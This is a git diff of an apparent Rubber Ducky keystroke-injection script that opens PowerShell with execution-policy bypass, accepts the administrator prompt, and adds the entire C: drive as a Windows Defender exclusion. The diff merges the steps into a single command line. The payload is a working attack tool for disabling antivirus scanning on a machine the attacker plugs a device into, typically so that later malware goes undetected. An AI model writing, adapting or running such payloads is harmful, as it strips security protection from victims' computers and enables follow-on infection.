diff --git a/Tools/Add Exclusion C-drive.txt b/Tools/Add Exclusion C-drive.txt index a701968..4222151 100644 --- a/Tools/Add Exclusion C-drive.txt +++ b/Tools/Add Exclusion C-drive.txt @@ -9,15 +9,7 @@ DEFAULT_DELAY 100 REM open powershell (remove -W Hidden to show the window). GUI r DELAY 750 -STRING powershell -NoP -NonI -W Hidden -Exec Bypass +STRING powershell -Exec Bypass -C Add-MpPreference -ExclusionPath C:\ CTRL-SHIFT ENTER -DELAY 1500 +DELAY 2500 ALT y -DELAY 5000 - -REM add the exclusion path. -STRING Add-MpPreference -ExclusionPath C:\ -ENTER -DELAY 250 -STRING exit -ENTER